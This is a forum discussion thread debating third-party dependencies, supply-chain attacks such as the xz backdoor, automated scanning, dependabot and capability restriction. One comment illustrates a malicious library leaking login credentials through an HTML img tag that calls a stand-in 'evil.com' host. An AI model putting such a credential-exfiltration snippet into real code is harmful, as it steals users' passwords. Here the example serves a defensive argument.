It's strange to me that you say this when the rest of your comment is arguing that you can take on hundreds of thousands and potentially millions of lines of third-party code without calling it "dependencies".
All of that code A) is still code and B) is still third-party and C) can still hurt you.
All of that code A) is still code and B) is still third-party and C) can still hurt you.
Doesn't matter. It's not code that I have any control over, I can't prevent someone from running my code in environments I don't control, so I'm not responsible for any security issues that might arise from it.
If I ship an application and Gallant runs it on seL4 while Goofus runs it on a 10-year old version of HackMyLinux running unsecured telnet as root, my role in the outcome is identical.
The set of code that might run under my own is unbounded -- maybe it's running bare-metal on a CPU soldered together from discrete components, maybe it's in a macOS -> Parallels -> Windows -> VMware -> Linux -> QEMU -> Haiku -> DOSBox stack and there are tens of thousands of individuals whose code affects whether mine functions correctly.
Doesn't matter, my responsibility is the same and it includes dependencies but not the user-provided runtime environment.
I can't prevent someone from running my code in environments I don't control, so I'm not responsible for any security issues that might arise from it.
I write applications, primarily networked services, which are deployed and run internally at my employer, and which depend on the existence of an operating system and its various standard tools and libraries to be able to run. If a vulnerability exists in any part of that huge pile of third-party code upon which my applications depend for their ability to run, I do not have the luxury of shrugging and disclaiming any responsibility for doing something about it. I have to treat the operating system and quite a lot else as part of the surface area of my "dependencies".
And my situation is not unique. Many, many other developers are in the same situation.
However, one thing that is not my problem or my responsibility is overcoming your seeming unwillingness or inability to understand that many people are in this situation, and therefore are not only justified but correct in counting many things, including the operating system, as part of their dependencies even though you personally may be in a situation where you feel they are not part of your dependencies. So I am done with responding to you.
At which point, you might as well take fuller advantage of other people's code and save yourself the time and trouble of trying to avoid or reproduce it.
What about the cases when that code actually costs more time and causes more trouble?
What about the cases when that code actually costs more time and causes more trouble?
More trouble than what?
Suppose that another xz-type incident happens tomorrow, meaning a compromise of a program that's part of the base operating system many people rely on, rather than a compromise of a language-specific library. Who will be better off in quickly moving to deal with that incident?
There simply is no realistic way to have zero third-party dependencies, and no realistic way to have zero problems related to third-party dependencies. Since you're going to have dependencies anyway, and you're going to have problems related to them anyway, the right thing to do is acknowledge that and build processes to handle that reality. And once you have processes which equip you to handle the fact that you have dependencies and will have problems related to them, they pose less trouble and cost you less to handle.
There simply is no realistic way to have zero third-party dependencies, and no realistic way to have zero problems related to third-party dependencies.
But zero is not really the goal. Getting rid of unnecessary dependencies is the goal, or dependencies of which you only use a tiny fraction of the surface area.
Getting rid of unnecessary dependencies is the goal, or dependencies of which you only use a tiny fraction of the surface area.
How do you know which ones truly are "unnecessary"?
If it's "unnecessary" because you could rewrite it yourself, you've just given yourself more code to review and maintain, and more surface area for bugs and vulnerabilities; are you accounting for the trouble and cost that brings to you? Are you accounting for the time that will be taken away from working on the actual thing you intended to build?
And if a dependency is "unnecessary" because you only use a tiny fraction of it, that's an argument for the JavaScript/npm style of ecosystem. If a package only exports a single function, you either use it or you don't, no unnecessary surface area is possible! Yet somehow I don't think you actually intend to be arguing for that.
How do you know which ones truly are "unnecessary"?
That's not going to be a particularly satisfying answer but I would say experience helps you with that, and just generally shifting your mind away from the idea that "everything is hard".
And if a dependency is "unnecessary" because you only use a tiny fraction of it, that's an argument for the JavaScript/npm style of ecosystem. If a package only exports a single function, you either use it or you don't, no unnecessary surface area is possible! Yet somehow I don't think you actually intend to be arguing for that.
That is never an argument in favor of this, because of the inherent risks small dependencies bring, which are disproportionate to the complexity of writing that function yourself or having an agent write it. I wrote about that problem years ago and I think that post aged very well.
That is never an argument in favor of this, because of the inherent risks small dependencies bring, which are disproportionate to the complexity of writing that function yourself or having an agent write it.
It feels like now you're moving the goalposts; first you said "zero is not really the goal", but you've rejected the idea of dependencies which might include code you don't use, and now are rejecting the idea of dependencies which don't. The only way I can interpret this is that it's not an argument for, as you initially said, trying to eliminate "unnecessary" dependencies, but rather for trying to never have any dependencies at all.
And I don't think you can actually pull that off, for reasons I've already covered. No matter what claims someone might make about not having dependencies, they are almost certain to be relying on third-party code that they don't control and could at any point suffer a compromise or other major issue. The people who manage to deal most successfully with those incidents are the ones who face reality and admit that they really do have dependencies and really do need to acknowledge that and build process around it.
I think you are seeing the world a lot more black and white than me. The goal for me is to err on the side of fewer and more established dependencies, where the cost/benefit analysis looks better, and I have encouraged other engineers over the years to do the same.
I work in a large org and we have multiple dependency update bot things. These are driven by compliance dashboards and not by developer demand. You cannot argue against them, as they are part of a larger compliance theater, and if they have gaps people will simply buy more of them. Software Engineering never was a great craft, but it is getting worse these days :-(
Nowadays everything that is published gets automatically scanned. That's why these supply chain attacks get reported in a matter of hours. For this reason you want to have quarantine options and not pick up the newest releases for a few days.
Also, the most severe supply chain attack, which could have compromised ssh on a lot of systems, was nearly successful - because there is no central place for C dependencies, just vendored copies and downloads from random places, and archaic toolchains glued together with shell scripts, which make it relatively easy to slip in malware without it being automatically detected.
Then languages with a lot of friction - e.g. where monkey patching is not possible, package managers enforce a clear higher-level structure, unsafe blocks are easily identifiable, and types enforce structural integrity - have a huge advantage. Making sneaky malware in them is just much more noisy and out of place, so the Slopuses have an easy time noticing it.
All in all I expect turbulence in near term, but security to actually increase in the mid to long term.
I'm skeptical of such automated scanning efforts, they feel like enumerating badness. You just won't ever be able to detect all the possible kinds of malicious code.
What's perfectly benign in one context can be malicious in another. For example, my email client has legitimate reasons for accessing my GPG key, and it also obviously has a lot of code for communicating with the outside world. Good luck automatically detecting a patch that wires these two up! LLMs are presumably decent at this, but they're not going to be perfect.
Not every backdoor has to be super obvious either; I think The Underhanded C Contest was a good example of that. Sure, you can use high-level, memory safe languages to make it much harder to introduce a good bugdoor, but it's never going to be impossible. How many bugs have been hidden in our software for decades without being found?
This is not to say that these automated scanners aren't at the very least pragmatic - they do catch a lot of bad stuff, and there's obviously a lot of value in increasing the cost of an attack - but this also feels distracting from the core problem. We shouldn't be trusting so much random code. Full stop. There are dependencies you can't avoid trusting with a lot of access[1], but e.g. liblzma shouldn't have access to anything besides the data it's (de)compressing, should it?
I wish our industry focused more on research in this area - think CHERI and such.
[1] and automated scanning is especially helpful here!
I agree about other defenses (and here is a good time to expound the virtues of wasm), and that scanners are never going to be perfect, but in many cases the signal they're picking up on is not just "this code is bad". For example, you can detect that a release contains code which is not present in the source repository. For projects for which that approach is viable (releases built only from published source, maintainers aren't regularly unilaterally pushing directly to main) this is an extremely effective defense. It doesn't protect against a malicious maintainer, as in the xz case, but it does catch many other kinds of compromise regardless of how subtle the malicious code is.
I'm skeptical of such automated scanning efforts
I'm not. It is extremely effective, and will become even more so. Just see today's fresh submission, which I happened to read: https://lobste.rs/s/lh9rmv/claude_code_found_linux_vulnerability
Meanwhile the Slopuses have a much easier job reviewing a new release of a relatively mature dependency: they can take a diff and focus on the typically tiny set of changes, which makes it very easy to raise any concerns with good accuracy.
For example, my email client has legitimate reasons for accessing my GPG key
I'm not going to have a dependency on a whole email client, which this post is about.
I'm going to have a dependency on a IMAP protocol crate, and maybe a GUI library, etc. etc.
Not every backdoor has to be super obvious either; I think The Underhanded C Contest
That's why no one should be using C and other memory-unsafe languages like it anymore. Languages that allow spooky obfuscated behavior, and whose unstructured tooling grants arbitrary code access (and makes it common to use it), are now an absolute no-no.
And really, as the above link shows, LLMs can see through hard-to-reason-about obfuscated code better than a human can.
but it's never going to be impossible
It never was impossible. But my point is that security of dependency supply chains is actually improving and going to actually improve even more.
We shouldn't be trusting so much random code.
But people don't pull in random dependencies for the lols. They use dependencies for reasons. All this talk about not having dependencies usually comes from developers of C and the like, whose software in practice can't parse command-line arguments properly, and is full of ad-hoc, half-broken protocols and parsers because they can't use a proper mature library to do the same thing. So they pretend their ad-hoc code and vendored, unpatched, copy-pasted code is so much more secure, because no one ever cares to look at it, while the central software repositories get scanned and reported on immediately.
liblzma shouldn't have access to anything besides the data it's (de)compressing, should it?
Sure. That can't be guaranteed in a memory-unsafe language like C, though. And liblzma's malicious code was actually sneaked in via autotools scripts, because the whole tooling is insanely primitive.
The same stuff could not possibly happen in Rust because it would stand out like an elephant, glaringly obvious to any human or LLM looking at it.
Both my email client and Underhanded C were just examples. (Actually, I wonder how many of the entries you could port to Rust and such - not all of them rely on memory unsafety etc).
An IMAP library doesn't really have much reason to access the filesystem, mess with running processes, [etc] either. Maybe it shouldn't even be able to create any new sockets? It's not a dependency you pulled in for the lols, but that doesn't mean it should have access to absolutely everything out there.
[liblzma's behaviour can't] be guaranteed in a memory-unsafe language like C though.
There's a reason why I mentioned CHERI :) I absolutely agree with autoconf being awful and a great way to sneak in malicious code, but I don't really think it was essential to the attack. It would've been much harder for Jia Tan to hide the backdoor if xz was a Rust project, but it wouldn't be impossible. I don't want my line of defense against supply chain attacks to be "It's hard to figure out how to smuggle a hidden backdoor into Rust code". I want to prevent my dependencies from doing things they're not supposed to do in the first place.
It's not like this would prevent all possible attacks - no matter what you do, a malicious IMAP library could still e.g. leak my login credentials by inserting an <img src="//evil.com/$user/$pass"> into an HTML message, but at least it won't be able to access the filesystem and steal my private keys or such. That's a hard guarantee. I don't have to hope that a scanner will catch it; it's just fundamentally impossible. I find that there's a concerning lack of such hard guarantees in modern systems.
It’s not every dependency you add that’s a problem; it’s every dependency you update
Something that baffles me is that I've been burned many times by updates but never by a supply chain attack or security vulnerability that needs to be patched. Updates are a bigger threat to the stability of my machines than malware.
I don't know if my experience is unique but this is why I never update dependencies unless they fix bugs or problems in my usage of them.
You are definitely not alone. Every dependency update is a source of fear. I tend to build systems from small, self contained parts (some people might call them microservices) and one of the top reasons is to enable dependencies to be managed independently on an as-needed basis.
As a practitioner of infosec, the old adage of automatic updates and auto dependency management has been turned on its head. The article does have a cogent point: complexity is the enemy of security.
Don't be like Ubuntu, be like Debian.
Which means: try not to chase the latest version of every package. Shut your dependabot down. Vendor and vet key deps.
P. S. I love Ubuntu and all they've done for the community.
That's a good analogy. Ubuntu has a bigger attack surface area because it has more stuff. But moving to Debian isn't 1:1 because I got rid of stuff. So, that shows the trade off pretty well.
I agree with the article that the update is the attack surface area in regards to recent news. Vendoring and vetting key deps still has a gap: who is doing the vetting and when? What does vetting look like? Reading the code? How do you read the code for the xz hack? If the code is hidden and the xz hack was notable because of the web of trust compromise, do I have to expand this out to social or a trust audit? Who do you, me, we trust?
If I have this problem with dev software, doesn't it apply to all software distribution? I like dependabot as an idea. It opens a request. It doesn't merge. You don't have to merge it. I like that dependabot is reacting to signal and events (CVEs). In general, I don't like timers that aren't actually related to time. I think it's a fallback. CVEs are signal. It's also trust and crowdsourcing.
Imagine you did a bit of vetting on a library and found something terrible. I would appreciate it if you shared that. You could contact the vendor or a central place and get an identifier for what you found. Then we can refer to it by name and link, and make recommendations for a fix, etc.
I'm curious to see where people go with this, if we over-correct. Maybe we need to advertise our current systems and describe what problems they solve.
Correct. Which is why libraries should be restrictable on their capabilities on the language level. In fact, every function call should be restrictable. Most libraries only need to do pure computations anyways. No need for them to do any kind of IO.
While I agree on keeping dependencies as low as you can, I disagree on dependabots.
Set it up with a cooldown period and remove the automatic approval. Have dependabot open the PR and merge after review.
For the Node.js aficionados, set save-exact=true in your npmrc to guard against automatic version-range updates on install...
That is... If by 'dependency' you mean blindly pull whatever some remote URL that you don't control sends you, trust it, compile it and run it without reviewing it. Then yes, of course. Don't we know this from the get go?
This has always been a huge security nightmare, by virtue of its very concept.
You can download a dependency, review it, and include it safely in your project. This has been done for half a century and it's how you should build stable, serious software.
It's not dependencies that are a problem. What's problematic is pulling them and using them without checking.
Automated updates should not be a thing. If an old version has a nasty security vulnerability, send out a warning to anyone using it instead of forcing them on a newer version.
Sure, most people will just update without auditing the code, but it gives us a chance to catch the attack. Take the xz affair: if it had automatic updates, every Linux/BSD box would instantly be compromised. It's only because of the delay introduced by manual updating that it was caught.
Even if no malice is involved, updating libraries breaks stuff. It's the reason software breaks randomly. Code written in a mature and rarely changed environment (like POSIX C) largely just works 30 years later. Code written in Python or Node breaks within months.
The thing is, modern package managers (and static linking) allow using a different version for each program. Getting rid of auto updates would fix both supply chain attacks and bit rot.